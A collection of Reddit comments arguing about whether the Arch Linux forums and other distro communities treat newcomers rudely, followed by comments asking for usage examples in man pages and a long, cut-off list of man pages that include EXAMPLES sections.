https://www.reddit.com/r/devops/comments/51uvx4/7_weeks_before_applying_to_a_devops_jobinternship/

A user in that thread reached out to me and took time to mock interview me. He had brought up a cloud instance, started apache and nginx on the same instance, changed the `root` directive in the `/etc/nginx/sites-enabled/default` configuration file, and also changed permissions on the `/var/www/html/index.html` file. He taught me about common configuration file locations, text filtering and processing, permissions, and managing services, about the importance of clear communication and repeatable examples. Two years later this same user is my mentor and we work together at the same company!

Now, I spend days, weeks, months, years, learning and working to compose a reliable and usable system. I write docs for my team, the moment I write them down, they're out-of-date! Imagine writing docs and answers for an Operating System, the complexity, the number of words, concepts, there is so much that is unknown, so many people feel afraid when they have don't understand something, they might say something that triggers you emotionally, that's okay, keep exploring!
Not all Arch users seem to understand that people have other priorities besides Linux.

It's a fantastic tool.  Just like a screwdriver.  Most people just buy them, so they can work on their actual project.   Making one yourself is fine, but I'm staying with Ubuntu for the time being.


Ubuntu isn't a n00b distro. The real distinction is how much control vs how much convenience you prefer.

Jumping straight to Arch might make perfect sense if you're whole reason for going to linux is that you hate not understand the system and you don't like bloat.

Staying with Kubuntu makes perfect sense even after using it for years if you're just trying to have a stable OS that does everything you want it to in an obvious way that doesn't require googling and manual setting up.
The problem is that you then end up at the opposite end of the spectrum. Sure, everyone is friends on the Ubuntu Q&A sites, but the vast majority of questions asked are some combination of badly phrased, trivial to answer, and completely irrelevant to most users. This is exactly what you'll get if you encourage _absolutely everyone_ to take part in the conversation, even when they don't have anything to add or their questions are easy to answer otherwise.

I'd much rather find out useful information on technical forums than make friends for the playground.
I don't know for you guys, but Arch community seems good to me.
I have found the Arch community to be very helpful (user for around 16 months).  In general, I believe it is there to solve issues that effect the whole community, not solve just solve an individual problem.

The ArchWiki main page (and it's subsections) nicely outlines FAQs, general recommendations, and a community Code of Conduct.  This includes how best to approach an issue, indicating what the first port of call is.  Then of course, there is generally a Wiki documentation which will likely cover the specific troubleshooting you may have, and will often provide a solution.  This, coupled with reviewing any solved queries found on the boards, and after extensive effort to try and solve it yourself should you really resort to ask for help.  By doing this the community will value your attempts, know that you have exhausted the existing and recognised solution, and therefore conclude that it is an issue that probably needs addressed.

The last thing you want to do is ask a question about an issue - that although may not be obvious or easy for you to solv - but can be found with a quick scan on the Wiki.  This just suggests that you haven't put in any effort, and are possibly too reliant on others.
You should not have to put up with a bunch of people who are disrespectful towards you. If you don't like the Arch community, you do have the option to use a different distro. Fedora, Ubuntu or any other major distro should be fine. I personally use Fedora, and any time I had a question (even a stupid question) on their IRC, there were good people who calmly and respecfully explained what I asked, or helped me through my problems. I've heard the same story from Ubuntu as well.
Arch forums seem to be the worst offenders TBH.
That's not just for Linux forums, that's just good life advice.
Yea, Arch people seem to be extra proud of themselves. 

Like, wow you installed an OS that has really good documented process to walk you through every step. Here's a gold star.
This, more than any other reason, is why I dislike arch, and there are a lot of things about arch that I dislike based purely on its merit as a technology.
I just stick to the Arch wiki, man pages, and the programs website/github because I hate all forums. 

99% of the time the wiki or man page has all the info I need. The other 1% tends to be to either downgrade a package, wait for an update which will come in a few days, or install something that was missing. 

One of the biggest reasons I love Arch is for the documentation, it means I don't need to interact with other humans.
This is where I have to interject and say Fedora has the best community. Although I don't use it (openSUSE FTW!) Everytime I've run into a problem, the Fedora subreddit and community forums have been polite, helpful, and prompt.

I can't say the same for Debian or Arch. 

openSUSE peeps are nice, and somewhat helpful. But they don't have a lot of devs lurking to give feedback.
No.
> has a MOD, which is someone who's supposed to help users

Not knowing arch, but that is usually not the job of a moderator. The job is to make sure the rules are followed?
So far, I've only posted questions on the r/archlinux, and there, most questions (also "noob") questions are answered politely, sometimes only links are provided but yeah, they seem a lot nicer.

I feel like the arch forums are more meant for documentation that is to niche for the wiki, like one guy finds a problem that is not documented and it is solved, and then no one else may ask it again.

Edit: 
In conclusion, if I have a question, I first ask it on Reddit and get a nice answer most of the time.
Ye. it's among the worst forums there is in the linux world. Their mods are total monkeys, with no social intelligence and literally all they have is , being a mod on online site.. The extent of 'power' and 'worth' is their online typing in such fora. Either way, you can see it with the comments of their on the forum and so on. Total shit. The thing is, the "devs" add some mods but you know, never fire them for being "run-away megalomaniacs" or the like. So there you go. Arch has great wikis as people know, but the fora are among the worst , if not the worst there are. You might get used to it (but shouldn't) , so rather move on to a better forum.

P.S. The mods on arch fora/irc channels etc. are pretty noobish, (most, not all), so the newbie vs. mod allegory below makes little sense.
Fuck you, sorry. *Kindly* fuck you.
Many of the defense here goes roughly like this: "Well, they asked stupid questions..." or "they are too lazy to do more research..." I guess many people don't realize that they have choice to just ignore "stupid questions", but yet they choose to click the comment button and spend some times to type some words just to be a dick and feel superior. 

I always remember the quote from Thumper in Bambi: "If you can't say something nice, don't say anything at all..."
Every time I post something here, I notice I get downvoted and it's always 1 or 0 that's shown. I don't understand why people in the community are dicks.
I just never get a response when asking on the arch forums (except recently someone necro'd my post to tell everyone he has the same issue - so ok, we're 2 now).  


IDK if that is better or worse.
Honestly, on r/archlinux, I don't really see any much noob hating. I don't use Arch Forums, not because I don't like them, but because Reddit and other things give me enough social interaction for the day. Try checking that out instead!
Same experience in the Mint support chat.

When I was just getting started I requested help with a problem.  Instead I received open ridicule from one asshole who lives online there.  When I suggested that there was no reason for him to be a jerk, the rest of the group jumped in to defend him.

It seem many of those that live and breathe Linux over everything else are in reality trolls sitting in mom's basement in their underwear.
Yeah, be careful with that mindset. Good intentions don't always produce good results. While it seems like a good idea, being nice to [help vampires] will eventually make the knowledgeable people leave. It is likely to result in the death of the community.

I don't think insulting people who ask for help is productive. It's a waste of time and gives the community a bad reputation. However, it's also a fact that people aren't _entitled_ to help.

[help vampires]: http://www.slash7.com/2006/12/22/vampires/
Arch users like to feel like elitists. If everyone who tries arch can use arch, the community grows to a point they can't feel like elitists anymore. That is why they don't have a graphical installer....that is why they don't organize their wiki so a new person to the distro gets the information they need to install without having to hunt for it... and that is why they're not welcoming in their community.

It's not new. [They posted it about themselves in 2014](https://bbs.archlinux.org/viewtopic.php?id=189919). They feel superior to you because they have the answer and you're asking the question. They feel you should have to work for it and they shouldn't have to answer it...yet, why they also feel the need to REPLY, I'll never know...other than just the personal satisfaction of "telling the noob off".

I recently installed arch, installed KDE on it....and just didn't care for the distro. You're not missing out much by not trying it out.
I'm baffled to see Ubuntu hoisted as an example of a good community because it isn't. It's toxic in every sense that rainbowhairs make out gamers to be if not worse.

If you want a welcoming, patient community that fosters and enriches all of the noobs with knowledge and wisodm, and sporting a friendly attitude whole at it, then you need to install Gentoo. But chances are you're not going to do it because you're scared of lengthy compilations. This can be helped too.
There are good and bad people. The bad ones for me are trolls.  
  
Many many many years ago I experienced the same with the Debian community. I've been trolled for everything, all the written rules of the netiquette, the amount of research I've done before to come to disturb the Gods of Mount HolyLinux, and so forth. 
  
At a point that I quit using Debian since than.  Even if I consider Debian a wonderful distro, and that Today it's a sane environment, I avoid Debian like a disease and I never advice people to choose it as an OS. I've been traumatized.  
  
In general, I also avoid to seek for help till I'm 100% sure my question was never asked before, in that sense it was benefical for me :D  
  
Trolls are the bad everywhere, and you cannot do that much but ignoring them. Trolls needs attention, when they won't have enough prouls, they will move somewhere else. 
  
The good ones they will blame you when you will come up with stupid questions, or when didn't go enough deep yourself. This is not wrong.  
  
Asking to not being a dick is probably the worst thing to do, because the trolls will enjoy to come and dance around you. 
  
Just ignore and do your homework before to post over there. ;)
This is exactly why we at ubports (and ubuntu) community try to be as kind and loving as we can be, there is no stupid question and people can ask all they want :) We accept everyone. Not everyone is able to ask so called "smart question" as some people say here, if you are new to Linux you don't necessarily know how to ask either, everyone needs to learn, and to this extend also how to ask questions. If you have never tried Linux how would you know where to begin to start asking? and yes it may sound 'dumb" to you, but you have probably been there when you was new... Since you already know the answer, it may sound "dumb" to you, and that they should know or read the wiki, but there was one time when you didn't know either. Also keep in mind not everyone is a native English speaker or maybe be quite young. I myself is not a native speaker, i know extremely well how hard it was to ask question back when i was new to Linux. Even now that I'm deeply into Linux development i even myself ask dumb question from time to time, we are all humans and not everyone can be perfect. All in all, there is no reason to answer "like a dick" back to anyone... Remember the question you asked when you started might be the exact same question you call "dumb" today!
That generally only happens if you don't do any research first. If you ask a question where you have clearly not tried to figure it out first, you'll get a lot of RTFM responses. If you are specific in what the issue is and what you've tried, people will try to help.  People want to help solve problems, not regurgitate the wiki that you should have already read.

That said, yeah still there are a lot of dicks.
This is why I've given up on the Arch forums - rude and stubborn mods who you couldn't reason with, they ruled like a dictatorship, it was so off-putting. Thankfully the Arch subreddit isn't anything like that.
[deleted]
Arch isn't worth it anyway, friend - the Debian project's loving, friendly embrace is awaiting you. Time to use a productive distribution with a productive community. <3
Is funny, but since I've been using Linux (2010) I asked for help many times, and I always am well treated... even in Slackware community (Slack, my eternal love). But, yes, I've heard stories of people being humiliated in community forums, even in Ubuntu forums (which should be forums for beginners). So I kind of related myself of your post... and agree: this kind of behaviour does not help to increase Linux community.
The more you know the more you realize how little you know. Those that don't know how much they don't know are generally the ones who are assholes and are also generally more inclined to fail.
So much shitty arrogance in IT/Development/Systems/DevOps/WhateverOps , it's can really get to you and I can understand why so many really good people leave the industry all together or just become monsters themselves :-/


I'm going to throw a theory out there as to why this might be, _testosterone_ :P, I think that could be 90% of the issue. Another theory relates to the type of work we are doing, knowledge work which has many levels of abstraction and takes many skill sets to be _capable_ in. You learn different things and have different perspectives at different levels of experience and understanding, this will be constantly changing and often along the way you will feel you are in a current state of "being right". Everyone wants and has so much pressure to be right a lot of the time. Deadlines are so tight, the cost of errors still so high that it's often your personal crusade to be right. Good organisations are able to understand that what you implement and get working will always be wrong and iterating over time. When you learn something it involved bring many _chunks_ of knowledge into a new stream of thought for a new _chunk_. We've all been doing for how ever many years or months and lose knowledge of that learning experience, which results in a lack of empathy for our fellow workers/learners. This can create a lot of tension and causes a lot of people lash out at new people. Everyone's learning path is different, not everyone will know the exact same thing. This is not a downfall of your team/group/organisation/tribe, this should be a recognised as a positive. Diversification and different learning experiences and pathways can add a lot to your team, best(worst) of all you might find knowledge caps in your own learning, this can again upset people because they feel, as the _Senior_ blah-da-blah role that they should know the most and direct on decisions.


What makes this even worse is how _Heroes_ are rewarded and held in such high regards in a lot of organisations.. This is the worst aspect of work for me, working 60-80 hours a week,, no family or fewer family/life commitments, being the best at solving things as an individual and having to always be right... it's exhausting for everyone else, managers, they aren't that great. They are great for managed/professional service companies because projects don't have longevity and being able to produce short term results is so important but for the rest of us it sucks.


I'm with you, don't be a dick, if someone doesn't know something or has a different approach see this as an opportunity and put forth empathy as your first reaction. Show them an alternative option, your perspective. More often then not I've seen peoples arrogance(fear)  cause them to dig into only supporting their own solution but keep working with them, the team, see what you can get out of the experience and if need be, move on. Easier to do in an internet forum, a little harder to do in a job/organization. This discussion, project, deployment is not your entire life.
It's diffcult not to get annoyed when the people posting their issues have clearly put little-to-no effort into solving the problem themselves.

Do your research, try to understand the problem. When a problem is easily solved by reading the manual or navigating to the first Google search result, we will tell you that, and it can annoy us.
RTFM.
Too be fair if you're a noob why are you using Arch?

I've been using Linux for about five years, Manjaro as a daily driver for about two, and I'm not ready to use set up and use Arch, and probably never will be.

The Arch community is clearly for people who like the exclusivity of doing something that is difficult, let them have their community and don't try to bypass or change their rite of passage.

There are plenty of other distros to start out on.
There really is a very toxic minority in the GNU/Linux community, but in this comment, I would like to focus on something very positive that I have recently experienced, instead:

I've recently been dabbling with Gentoo and trying to get it run, and I must say; the Gentoo community is really awesome!

I read the handbook, but I still got a few problems while installing and the people on IRC were just wonderful; there was a person who spent 20 minutes of their time trying to help me. They also went the extra mile and gave me a few tips on things to do after I actually install and configure the system! <3

Unfortunately, I can't say the same for a lot of the experiences I have had in other GNU/Linux communities; we have a very toxic minority in our community that is very elitist and enjoys bringing down newbies.

Because of the experiences I had with other GNU/Linux communities, I was initially very hesitant to join the gentoo channel on freenode and ask my questions, but I was so pleasantly surprised.

I encountered other problems while installing that I was able to solve by googling and finding forum posts by other beginners who encountered similar problems. The feeling I got by reading the forum posts is that the Gentoo community is extremely friendly and welcoming to beginners.

I might be wrong, since I am new to Gentoo; maybe Gentoo also has an elitist and toxic minority, but the friendliness I experienced in the Gentoo community really left a wonderful taste in my mouth.

So, I guess the behavior OP is describing really depends on what community you are in and the kind of behavior the community encourages.

Unfortunately, the toxic and elitist behavior that a minority of the GNU/Linux community is plagued with is not limited to GNU/Linux; I've experienced similar things while studying computer-science. There are a lot of elitists and dicks in computer-science, as well. But one thing I realized is that truly knowledgeable people are usually very humble and friendly, because what I have realized is that the more you learn, the more you realize how much you don't know. The elitist dicks are usually the ones who don't know as much as they want you to think, but they are insecure about their lack of knowledge and cover it up by pretending that newbies are beneath them.
Just don't use the forums. Use IRC or the wiki
Have you read the extensive and well written wiki first before asking?
I used to spend a lot of time on /r/tor because I love the technology and I love talking about it. However I don't so much anymore because of stupid questions.

What is a stupid question in this context? A stupid question is one that can be solved with 10 minutes or less of personal research.

Example stupid questions that I have seen recently:

* How do I install Ubuntu?
* How do I install a package with pacman?
* Where can I find a hospital in my city?
* How do I make X work on Windows 10  (in a Linux forum)?

This is disrespectful to the people on the subreddit and to their time because you didn't try to find it yourself.

There are also stupid answers. These are answers that are designed to insult, humiliate, or annoy the user.

* RTFM-Read The Friendly Manual (but I won't tell you where or which one)
* LMGTFY

Like most people, I'm guilty of both asking stupid questions and giving stupid answers. We're not perfect. We have bad days and sometimes we're a little lazy or in a bad mood. That's not an excuse for being a jerk to newbies or to expect someone to be your own personal Google.

One last thing:

Giving someone a concise link and description on how to answer a question isn't the same thing as telling someone to RTFM. **Don't expect someone to chew your food for you.** If you ask a basic question like how to install an application with pacman and you are given the pacman cheat sheet with all of the common commands, then say Thank You and find the one that you need. Don't blow up because you aren't given that one command that you need at that moment.
I've been burned on Arch forums a couple times but it was tough love because it pushed me to think harder.
[deleted]
I suggest you try out Manjaro. It is easier to setup and work with and Manjaro community is much nicer to noobies, at least in my experience.
Yeah I was banned immediately after my first question on the Arch forum because I told somebody I didn't need his shitty attitude. The mod said that since his information was accurate I should have just been happy to receive it.
Bro I'm still trying to stop telling my coworkers how to fix a problem if this was Linux server. Or you know in Linux this would never happen.

I'm glad I stopped at Manjaro.
I remember back when I started modding Android.


XDA forums were scary... People were assholes

They still are intimidating in most threads but it's become much nicer
Having spent a lot of time in both sides, Ubuntu's community is good for basic stuff but falls super short in things that are a little more niche. Arch's community and documentation goes way more in depth, so much so that it's applicable to many other distros. 

I do agree that the arch forums could soften up but when I've asked weird niche questions with logs, they've been helpful.

One thing I'd change is when people ask for certain logs, they'd give the simple one line command to get the logs because its not always obvious and in the 10 or so years i've been using linux, I still run into logs I haven't used before due to blind luck.
I prefer IRC for support
On one hand, I understand why Arch users are this way, but on the other... no. I cant tell you HOW much it enrages me to see thousands of, "this is how you Linux" articles by stupid people who dont know what they are talking about. Of which, it has been really good for me to be jacking around with FreeBSD, as it isnt tainted with that yet (so their is a gap in the market for me to fill.)

Arch portrays itself as goodly documented and many a man says "RTFM," but their "manual," unlike the FreeBSD handbook, isnt that clear.

What I like about Suckless' software, is it has to be compiled so it avoids the issue of too new of people that would ask the same questions instead of googling. Arch, though, portrays itself as user friendly, which is bad.

Not all Arch users are elitest, it is just the ones who are, are, and are too frequent.

Honestly, for someone new to Arch, I would honestly direct them to Luke Smith's YouTube channel.
arch is repeating the RTFM cycle other distros already went through. i don't know if it's elitism or something, although people are not such assholes on gentoo forums - which requires more work to setup. as for even more work demanding LFS - not sure if that even has user forums.
"**User centrality**

*Whereas many GNU/Linux distributions attempt to be more user-friendly, Arch Linux has always been, and shall always remain user-centric. The distribution is intended to fill the needs of those contributing to it, rather than trying to appeal to as many users as possible. It is targeted at the proficient GNU/Linux user, or anyone with a do-it-yourself attitude who is willing to read the documentation, and solve their own problems.*"

[https://wiki.archlinux.org/index.php/Arch\_Linux](https://wiki.archlinux.org/index.php/Arch_Linux)

&#x200B;

It's not that difficult. Most questions being rejected are legit, if not all.
Yep, this is a real issue. Instead of uniting and promoting our preferred operating system to get more people onboard (which in the long term would benefit everyone in the community) we act as privileged assholes.
Typical Arch's user reply: USE GODDAMN ARCH WIKI EVERYTHINGG WRITTEN IN THERE YOU NOOB CANT EVEN READ
The NixOS community is great so far as a newbie. I can only recommend to switch. I had only motivating encounters so far and there is a lot of documentation.
Hey you think that's bad, wait till you find the threads where users raise issues where Arch's design is lacking, like package-signing-gate:

https://bbs.archlinux.org/viewtopic.php?id=35609

The hyperdefensiveness and bikeshedding gets **wild** man
Tell that shit to the linux discord server.
Know your pain but what you're doing here is the equivalent of a bottle of Vodka and complain that the alcohol inside is too strong to you.

If you read carefully the last paragraph from here [https://www.archlinux.org/about/](https://www.archlinux.org/about/) you will understand why the whole sarcasm and "bullying".

Understand that the regular behavior of someone new at Linux is always ask instead of research. That's normal, we want fast answers, we live a era where everything needs to be fast. But as you read on the link I've posted Arch is not designed for beginners. It's not their core target audience.

For sure they don't discourage the newbies to come around but those fellas (like me few years ago) need to learn how to read the manual before hitting the forum. That behavior of not spending too much time reading manual or at least their Wiki tends to be very annoying for the actual audience (actual senior power users) because the distro is also on rolling release mode. So things tends to break if you just push buttons without reading the change logs first.

Don't come here asking "Nasa" to behave like "kindergarden" there's a minimal requirement to use distros like this one. Same goes if you decide to stop programming in high-level languages and go to Fortran or Assemble. There's a minimal requirements a maturity on specific aspects of computers to be there and its high.

I always recommend Fedora, SuSE and Ubuntu to beginners. They will eventually start feeling the need to go beyong UIs. They will hit the forum from those distro and start to accumulate knowledge on how to maintain a Linux based OS. They will eventually start craving for something more sophisticated.

Sorry if it sounds bit tough but i was there. Suffering "bullying" for not being able to try doing my homework first. After 6\~7 years on Arch Linux as my main distro i realized that posting new threads on Forums are just a waste of space most of the time. Solution is out there waiting to be read.

All i can say is that Arch Linux taught me how to be a actual power user. I Appreciate take the leap from Ubuntu to SuSE, from SuSE to Slackware and reaching Arch. It was rewarding.

I dont use it anymore. Currently on Fedora (never used before) and thinking on switch from the Workspace variation to Silverlight one. Can use it anymore because it gives too much freedom. Really easy to get addicted on spending time and more time ricing it. I just need something stable to work.

(I will look on the forums for my 1st and 2nd post on Arch's forum you're going to laugh on how childish it was)
This happens more in the "user" part of things though. Not that's a good thing being a dick, but sometimes also noobs are at fault for lacking initiative. Like asking 100 times the same thing you find with a search
Is it ok to call noobs dicks?
i am not justifying horrible behavior from Linux groups but they do it for free arch is generally more of a power user group as opposed to Debian or Ubuntu which are more suited for beginners make sure to read the arch documentation your best bet is to ignore these people there are always bad apples in every area of life and look at the rules on the forum and try to clarify stuff what you may consider mean and horrible the person who is typing the answers may not consider it that at all
I've found linux helpfulness on reddit and the armbian forums to have really really improved in the past 10 years.

If you asked a dumb question 15 years ago, you'd cop it, now it's pretty decent.
I've been using/toying with Linux for the better part of 20 years. It's always been this way, and it's always been painfully ironic that the community is often held up as one of Linux's great assets.
I think r/linux fixation with the arch linux forum is incredible funny.
Outrage / troll culture merged with little to no actual social skills and zero empathy.
Are you talking about [this newbie corner forum](https://bbs.archlinux.org/viewforum.php?id=23)? There are some very old sticky posts which might be construed as noob-unfriendly (although I would say they are more managing expectations about using a DIY distro), but in the actual questions I couldn't find any examples of what you are complaining about, let alone "literally every post."
Arch, being mean to noobs has become some sort of rights of passage or something. At first, you are the noob and people are mean to you, then you learn and you are in turn mean to new noobs. It's like a bulling cycle or something that you might find in a school. At this point, I'm not sure if the Arch forum regulars can remember why they were pissed off in the first place. Who was the originator of the mean response to someone not reading the WiKi thus starting this cycle of dickery?

Personally, I just run Manjaro and I really don't care what distro you run. I do however know that if I have a problem I can't find an answer to there is a friendly forum where I can ask for help.
I completely agree with you. I've been using Arch as my primary OS for the vast majority of my Linux career at this point and I find the forums somewhat contemptible. As a team member of another distro I understand that it's annoying when newbies who haven't the slightest clue what they're talking about totally bork up their systems and whine on the forums seemingly without doing any research. We do our best to help the users anyway, though I'm sure my phrasing occasionally comes off as aggressive. The Arch forums on the other hand often take any opportunity to berate even people who are pretty well versed (but not as well as them) and in many cases don't even try to provide any insightful information on the problem in the process. Berating someone and telling them to search the wiki isn't all that helpful, especially in cases where they may very well have tried that but couldn't find the exact article that mentions their problem for whatever reason. The Arch Wiki is basically the sacred texts for me but I still have trouble navigating it sometimes and the structure is not always 100% obvious.
I’m always friendly when a new user needs help. Being polite makes new users feel welcome, and it’s something that Linux and open source communities need to do.
I can't believe this guy just tried to combine an ending parentheses with an emote. The nerve of some people.
you know, its hilarious how /r/linux has a thread about arch community being dicks but they were autobanning users for using the "nice" word on the Firefox 69 thread
I refer you to rule one, this is not the forum you're looking for as a newbie.
A good 80% of the time, I just forgot the syntax for absolute basic usage and a very general example is all I need to refresh and remember everything or solve my problem. I don't want to read through everything and review all the switches I won't really want to use.

To any manpage writers out there: please add examples. It takes two seconds and saves thousands of people time.
I really don't understand why more CS references don't teach by examples instead of listing rules and expecting you to figure out how to apply stuff yourself. Maybe it just has to do with my style of learning, but reading something more abstract is a slow, often painful process, where if I can just see a few examples I can play around with them and things become clear as day. In fact, once I get my hands on a few examples and try things out, the theory starts to make perfect sense.  I have no problem with the more abstract side of things, but I like to get my hands on the concrete before I go deeper. 

Is that just my learning style, or are others like that? Do some people prefer to see the theory first?
I can't upvote this enough. Nothing is more frustration then reading an entire man page and not knowing how to use the most basic features of the program. 
1. man command
2. Sigh because wall of text
3. Google
HELL YEAH!!!
[deleted]
I agree, and have proposed this before at various times too.

From what I have gathered, some members of the community believe that usage examples do not belong in man pages. Therefore the solution is not as simple as improving the existing documentation. It appears we need to forcefully re-educate the resisters.
Oh my god, this is my biggest Linux pet peeve. How hard is it to add an example for fuck's sake. 
Alternatively, if it only takes two seconds you could submit patches for your favourite manpages and include every example you feel is relevant.
I like examples too, and I wish they were more common, but I'd like to point out that EXAMPLES sections are included in the manpages of many programs etc., such as aa_change_hat, aa-decode, accept, accept4, access, access, acpid, AF_LOCAL, AF_UNIX, all-swaps, alphasort, alt-nvidia-current-settings, alt-nvidia-current-smi, alt-nvidia-current-xconfig, amidi, amixer, annotate-output, aplay, apparmor, apt, aptdcon, apt-ftparchive, apt_preferences, apturl, apturl-gtk, arecord, arm2hpdl, arpd, asn1parse, atexit, Authen::SASL::Perl::GSSAPI, awk, backtrace, backtrace_symbols, backtrace_symbols_fd, basename, basename, bc, bdftruncate, be16toh, be32toh, be64toh, bf_tar, bf_tar-bdb, bind, bsearch, ca, CA, cat, cdparanoia, chacl, chgrp, chown, chown, chown32, cidr_table, ciphers, Class::Accessor, clock_getcpuclockid, cmsg, CMSG_ALIGN, CMSG_FIRSTHDR, CMSG_NXTHDR, CMSG_SPACE, codepage, colcrt, column, comm, complex, complex, compose, computer-janitor, config, confstr, conky, connect, control-alt-delete, core, corelist, CPU_ALLOC, CPU_ALLOC_SIZE, CPU_AND, CPU_AND_S, CPU_CLR, CPU_CLR_S, CPU_COUNT, CPU_COUNT_S, CPU_EQUAL, CPU_EQUAL_S, CPU_FREE, CPU_ISSET, CPU_ISSET_S, CPU_OR, CPU_OR_S, cpuset, CPU_SET, CPU_SET_S, CPU_XOR, CPU_XOR_S, CPU_ZERO, CPU_ZERO_S, crl, crl2pkcs7, crontab, crsh, cssh, ctel, ctstat, cupsctl, cupstestppd, Date::Parse, dbus-monitor, dcmd, dcut, ddate, debconf, debconf-apt-progress, debconf-communicate, debconf-copydb, debconf-set-selections, deb-control, debootstrap, deb-shlibs, deb-symbols, debuild, Defoma::Common, defoma-font, Defoma::Font, defoma-hints, Defoma::Id, defoma-subst, Defoma::Subst, dirname, dirname, dirsplit, div, dladdr, dlclose, dlerror, dl_iterate_phdr, dlopen, dlsym, dlvsym, dmsetup, dnssec-dsfromkey, dnssec-keygen, dnssec-signzone, dpkg, dpkg-architecture, dpkg-divert, dpkg-name, drem, dremf, dreml, dsa, e2freefrag, e2fsck, ec, ecparam, edata, edit, eject, enc, encrypt, encrypt_r, end, endaliasent, endian, endutent, endutxent, envz, envz_add, envz_entry, envz_get, envz_merge, envz_remove, envz_strip, erl_call, err, errstr, errx, esdcat, esdrec, esdsample, etext, ethers, eventfd, eventfd2, eventfd_read, eventfd_write, execve, exiv2, extresso, fakeroot, fakeroot-sysv, fakeroot-tcp, fchown, fchown32, fc-list, FD_CLR, FD_CLR, FD_ISSET, FD_ISSET, FD_SET, FD_SET, FD_ZERO, FD_ZERO, feature_test_macros, ffmpeg, fgetgrent_r, fgetpwent_r, fiascotopnm, file, filesystem, filterdiff, find, findsmb, fmemopen, fmtmsg, fonts-conf, foo2hiperc, foo2hiperc-wrapper, foo2hp, foo2hp2600-wrapper, foo2lava, foo2lava-wrapper, foo2oak, foo2oak-wrapper, foo2qpdl, foo2qpdl-wrapper, foo2slx, foo2slx-wrapper, foo2xqx, foo2xqx-wrapper, foo2zjs, foo2zjs-wrapper, fopencookie, fork, fping, fping6, fprintf, freeaddrinfo, freeifaddrs, frexp, frexpf, frexpl, fstab-decode, fstat, fstat64, ftm, ftw, funzip, fuser, gai, gai_strerror, gamma4scanimage, gconftool, gconftool-2, generic, genisoimage, genisoimagerc, getaddrinfo, getaliasbyname, getaliasbyname_r, getaliasent, getaliasent_r, getbuildlog, getdate, getdate_err, getdate_r, getdelim, getdents, getdents64, getgrent_r, getgrouplist, getifaddrs, getline, getnameinfo, getOpenFile, getopt, getopt, getopt_long, getopt_long_only, getprotobyname_r, getprotobynumber_r, getprotoent_r, getpwent_r, getpwnam, getpwnam_r, getpwuid, getpwuid_r, getSaveFile, getservbyname_r, getservbyport_r, getservent_r, getsubopt, getty, getutent, getutent_r, getutid, getutid_r, getutline, getutline_r, getutxent, getutxid, getutxline, gipddecode, glob, globfree, gnome-open, gnu_get_libc_release, gnu_get_libc_version, gparted, gpg, gpgv, gpg-zip, gpodder-backup, grep-aptavail, grep-available, grep-dctrl, grep-debtags, grep-status, groff, grog, group, growisofs, gst-launch-0, h2xs, hbcixml3, hcreate, hcreate_r, hd, hdestroy, hdestroy_r, header_checks, hexdump, hipercdecode, hosts, hosts, hosts, hosts_access, hp-makeuri, hp-probe, hp-setup, hsearch, hsearch_r, HTML::Element::traverse, HTML::Filter, HTML::HeadParser, HTML::LinkExtor, HTML::Parser, HTML::PullParser, HTML::TokeParser, htobe16, htobe32, htobe64, htole16, htole32, htole64, icotool, iecset, ifdown, ifup, imaxdiv, inet, inet_addr, inet_aton, inet_lnaof, inet_makeaddr, inet_netof, inet_network, inet_ntoa, inet_ntop, inet_pton, info, infobrowser, initramfs-tools, intel_reg_read, intel_reg_write, interdiff, ionice, ip6tables, iptables, ispell-wrapper, join-dctrl, jpegtopnm, json_xs, JSON::XS, kde4-config, keyboard-request, keymaps, keytool, kill, kvm, lavadecode, lchown, lchown32, ldap_table, ldconfig, ldiv, le16toh, le32toh, le64toh, lesskey, lexgrog, libao, libvga, libvirt-migrate-qemu-disks, limits, listen, lldiv, lnstat, localedef, local-filesystems, locate, lockfile-check, lockfile-create, lockfile-progs, lockfile-remove, lockfile-touch, logger, logprof, lorder, losetup, lp, lsdiff, lshw, lsinitramfs, lsof, lstat, lstat64, luit, lvremove, lvrename, lwp-download, mail-lock, mail-touchlock, mail-unlock, makecontext, make_method, malloc_hook, man, man-pages, matherr, mawk, mdoc, mempcpy, mencoder, MIME::Lite, min12xxw, mkinitramfs, MLDBM, mlocate, mmap, mono-config, mount, mount, mount, mount, mount, mounted, mounting, mplayer, mprotect, mq_notify, mq_notify, mq_overview, multitail, munmap, namespace, nawk, nc, ncat, nc_openbsd, ndiff, netcat, Net::DBus::Exporter, netlink, netscsid, Net::SSLeay, Net::SSLeay::Handle, nftw, nisplus_table, nmap, nmblookup, nmblookup, nseq, nsupdate, ntfs-3g, ntfs-3g, ntfs-3g, ntfs-3g, ntfscat, ntfsclone, ntfscluster, ntfscp, ntfsmount, ntfsundelete, nvidia-settings, nvidia-smi, nvidia-xconfig, oakdecode, ocsp, offsetof, ogg123, oggdec, oggenc, oldfind, oldfstat, oldlstat, oldstat, open, open_memstream, openvt, open_wmemstream, opldecode, optarg, opterr, optind, optopt, pam_debug, pam_deny, pam_echo, pam_env, pam_exec, pam_faildelay, pam_filter, pam_ftp, pam_issue, pam_keyinit, pam_lastlog, pam_limits, pam_listfile, pam_localuser, pam_loginuid, pam_mail, pam_mkhomedir, pam_motd, pam_namespace, pam_nologin, pam_permit, pam_pwhistory, pam_rhosts, pam_rootok, pam_securetty, pam_selinux, pam_sepermit, pam_shells, pam_succeed_if, pam_tally, pam_tally2, pam_time, pam_timestamp, pam_timestamp_check, pam_umask, pam_unix, pam_userdb, pam_warn, pam_wheel, pam_xauth, passwd, pbmtoppa, pcap-filter, pcimodules, pcre_table, PF_LOCAL, PF_NETLINK, PF_UNIX, pgmtexture, pgrep, pipe, pipe2, pivot_root, pkcs12, pkcs7, pkcs8, pkexec, pkill, pklocalauthority, pnmtofiasco, pnmtojpeg, pnmtorle, pod2man, power-status-changed, ppmfade, ppmqvga, ppmshift, ppmtoicr, ppmtojpeg, pppd, pptp, prezip-bin, print, printer-profile, printf, ps, ps2pdf, ps2pdf12, ps2pdf13, ps2pdf14, psed, pselect, pselect6, pthread_attr_getguardsize, pthread_attr_getstack, pthread_attr_getstacksize, pthread_attr_setguardsize, pthread_attr_setstack, pthread_attr_setstacksize, pthread_getaffinity_np, pthread_getattr_np, pthread_getcpuclockid, pthread_setaffinity_np, pthread_timedjoin_np, pthread_tryjoin_np, purple-remote, pututline, pututxline, pvcreate, pvmove, pvresize, qemu, qemu-system-i386, qemu-system-x86_64, qpdldecode, qsort, rand, rand_r, rc-alert, readom, readprofile, readv, recv, recvfrom, recvmsg, redland, regexp_table, remainder, remainderf, remainderl, remote-filesystems, req, rletopnm, rndc, rndc-confgen, route, rpcgen, rpcinfo, rpmatch, rsa, 